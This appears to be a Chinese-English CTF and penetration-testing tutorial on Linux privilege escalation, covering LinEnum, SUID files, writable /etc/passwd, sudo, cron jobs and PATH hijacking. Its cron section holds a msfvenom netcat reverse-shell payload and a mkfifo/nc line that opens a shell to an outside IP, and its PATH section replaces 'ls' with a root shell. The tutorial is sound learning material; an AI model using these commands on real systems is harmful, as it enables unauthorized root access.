【总结】提权基础与五种姿势

简介: 本次总结主要是讲解什么是提权以及常见的五个linux提权漏洞,适合初学者进阶。

privilege escalation**

 

bilibili讲解:https://www.bilibili.com/video/BV1cd4y137CH/

 

What does "privilege escalation" mean?

其核心是,权限提升通常包括从较低的许可到较高的许可。从技术上讲,它是利用操作系统或应用程序中的漏洞、设计缺陷或配置疏忽,以获得对通常受用户限制的资源的未经授权的访问。

Why is it important?

在进行 CTF 或现实世界的渗透测试时,你很少能够获得一个立足点(初始访问) ,让你的管理员可以访问。权限提升是至关重要的,因为它可以让你获得系统管理员级别的访问权限。

Direction of Privilege Escalation

1 (2)

 

LinEnum

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

https://www.zacarx.com/a/LinEnum-master.zip

法一:using "python3 -m http.server 8000" [1].

Then using "wget" on the target machine, and your local IP, you can grab the file from your local machine [2].

Then make the file executable using the command "chmod +x FILENAME.sh".

法二:创建文件复制粘贴,+x,执行。

we will focus on:

1.内核信息与漏洞利用

2.可以读/写敏感文件

3.SUID 文件

4.Crontab 内容

常用命令:

cat /etc/passwd 查看用户

cat cat /etc/shells 查看shell

cat /etc/crontab 查看任务

1.USID

find / -perm -u=s -type f 2>/dev/null

- perm-搜索具有特定权限的文件

- u = s-为文件设置任何权限位模式

- 类型 f-只搜索文件

2 >/dev/null-抑制错误

2.Exploiting a writable /etc/passwd

root:.x:0:0:root:/root:/bin/bash

username:password:uid:gid:info:home:shell

https://www.zacarx.com/a/LinEnum-master.zip

3.sudo -l

查看演示

4.Crontab

cat /etc/crontab

# = ID

m = Minute

h = Hour

dom = Day of the month

mon = Month

dow = Day of the week

user = What user the command will run as

command = What command should be run

e.g.

17 * 1 * * * root cd / && run-parts --report /etc/cron.hourly

msf

msfvenom -p cmd/unix/reverse_netcat lhost=10.14.29.86 lport=8888 R

echo "mkfifo /tmp/ticcszm; nc 10.14.29.86 8888 0</tmp/ticcszm | /bin/sh >/tmp/ticcszm 2>&1; rm /tmp/ticcszm" > autoscript.sh

nc -lvp 8888

5.Exploiting PATH Variable

What is PATH?

PATH 是 Linux 和类 Unix 操作系统中的一个环境变量,它指定保存可执行程序的目录

例如,ls位于特殊权限位,我们可以重写 PATH 变量到我们选择的位置!因此,当 SUID 程序调用系统 shell 来运行一个可执行文件时,它会运行一个我们编写的可执行文件!与任何 SUID 文件一样,它将使用与 SUID 文件所有者相同的权限运行此命令!如果这是 root,使用这个方法,我们可以作为 root 运行任何我们喜欢的命令

script——ls

让我们将目录更改为“ tmp”

Echo“[ whatever command we want to run ]”> [我们正在模仿的可执行文件的名称]

echo "/bin/bash" >> ls

chmod +x ls

export PATH=/tmp:$PATH

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH

重回原样

清单分享

https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html https://payatu.com/guide-linux-privilege-escalation

 

目录
相关文章
|
数据安全/隐私保护
「域渗透」域账户的几种攻击方式
「域渗透」域账户的几种攻击方式
|
XML Java Maven
IDEA安装及创建Maven项目教程【史上最详细】(二)
IDEA安装及创建Maven项目教程【史上最详细】(二)
1489 0
|
SQL 安全 Unix
缓冲区溢出攻击
【8月更文挑战第17天】
414 2
|
6月前
|
SQL 安全 数据库
常见的框架漏洞
了解和防范常见的框架漏洞是开发安全Web应用的基础。本文介绍了SQL注入、XSS、CSRF、RCE和目录遍历等漏洞的描述和防御措施,通过合理使用框架提供的安全功能和编写安全的代码,可以有效地防止这些常见的安全问题。开发者在实际项目中应时刻保持安全意识,定期进行安全审计和测试,确保应用的安全性和稳定性。
379 38
|
8月前
|
SQL 安全 关系型数据库
MySQL UDF提权
通过这些内容的详细介绍和实际案例分析,希望能帮助您深入理解MySQL UDF提权的机制、实现步骤及防范措施,提高系统的安全性和防护能力。
533 11
|
网络协议 数据库 网络架构
ENSP中OSPF多区域管理 (原理和配置)
OSPF 多区域的主要作用是缩小链路状态数据库和路由表的规模,减少路由更新的频率,提高网络的可扩展性,实现路由过滤和路由汇总,从而提高网络的性能、稳定性、安全性和可管理性。OSPF 多区域的主要作用如下ABR的摘要 配置命令
703 0
ENSP中OSPF多区域管理 (原理和配置)
|
监控 安全 网络安全
防火墙和入侵检测系统
【8月更文挑战第16天】
530 1
|
算法 网络安全 开发工具
TLS/SSL 协议-非对称加密(RSA)原理
TLS/SSL 协议-非对称加密(RSA)原理
482 0
|
SQL 关系型数据库 MySQL
【权限提升】六种数据库提权&口令获取
【权限提升】六种数据库提权&口令获取
305 1
|
存储 算法 JavaScript
结构化克隆API的前世今生:从深拷贝到原生力量structuredClone()
结构化克隆API的前世今生:从深拷贝到原生力量structuredClone()
239 0